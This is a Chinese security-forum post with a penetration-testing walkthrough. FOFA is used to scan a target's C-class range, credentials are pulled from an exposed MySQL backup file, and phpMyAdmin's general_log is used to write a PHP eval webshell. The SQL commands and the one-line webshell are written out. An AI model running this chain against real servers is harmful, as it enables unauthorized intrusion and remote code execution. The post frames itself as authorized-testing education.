安全矩阵

 找回密码
 立即注册
搜索
查看: 2500|回复: 0

【渗透实战系列】|17-巧⽤fofa对⽬标⽹站进⾏getshell

[复制链接]

991

主题

1063

帖子

4319

积分

论坛元老

Rank: 8Rank: 8

积分
4319
发表于 2022-1-23 14:00:04 | 显示全部楼层 |阅读模式
原文链接:【渗透实战系列】|17-巧⽤fofa对⽬标⽹站进⾏getshell



昨夜,FOFA系统暂停对外开放,安全圈一片懵圈!
这篇文章前年写的,工作中渗透实战的案例,借助fofa开展的渗透测试,
渗透思路简单而且清晰,非常适合入门学习。
此次重新整理、补充部分内容进去后重新发布,
希望能给你对fofa、对网络资产搜集、对渗透测试有更深的理解。



fofa暂停通知



涉及知识点:

信息搜集目标网站IP
利用fofa对目标ip的c段进行搜索
发现数据库备份文件和管理界面
登录数据库页面,进行写马
写马成功,获取webshell

声明:本文仅用于有授权的渗透测试。

1、信息搜集网站IP

目标测试网站地址aa.bb.com
通过信息搜集获取到,该网站地址为ipw为x.x.x.x (站长之家等网站均可以搜索到IP)

2、fofa对目标地址C段进扫描

fofa输入关键字ip=“x.x.x.0/24”进行搜索,意外发现c段开着8090端口的地址,
这里搜索的目的就对目标IP同一C段下,搜索是否存在其他网站,通常暴露目标站的IP防护性会比较高,而其他Ip 安全性相对低些,而且经常可以检索到常用业务的端口,更有针对性开展渗透测试。



3、访问端口,发现MySQL管理页面

打开http://x.x.x.x:8090发现遍历文件目录,且意外发现数据库备份软件和mysql管理页面  ,更为以外的是发现了数据库账号和密码文件                  


4、发现数据库账号和密码

打开数据库备份文件mysqlbackup.bat发现账户和密码

打开mysql管理页面
http://x.x.x.x/MySQL/ 发现为phpMyAdmin管理页面,利用备份文件获取的账户和密码顺利登录,这就好办了,下一步就是写入木马了


5、phpMyAdmin写马

phpmyadmin后台getshell的常用手段有以下几种方式:
    1. select into outfile直接写入
    2. 开启全局日志getshell
    3. 使用慢查询日志getsehll
    4. 使用错误日志getshell
    5. 5利用phpmyadmin4.8.x本地文件包含漏洞getshell
    复制代码


show variables like '%secure%';


发现没有写入权限,无法用select into outfile方法写入shell。我们再来看一下第二种方法,利用全局变量general_log去getshell

我们将全局日志开启并将保存日志的目录设为web目录
set global general_log=on;# 开启日志  set global general_log_file='C:/phpStudy/WWW/yxcms/hack.php';# 设置日志位置为网站目录设置成功

此时执行如下语句即可写入webshell到hack.php中
select '<?php eval($_POST[whoami]); ?>'


6、蚁剑连接木马getshell


至此顺利写马getshell,下一步就可以提权、内网渗透了,此处不多做叙述了,如果想学习内网,可以看本公众号【内网渗透系列】文章。



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 23:47 , Processed in 0.017778 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表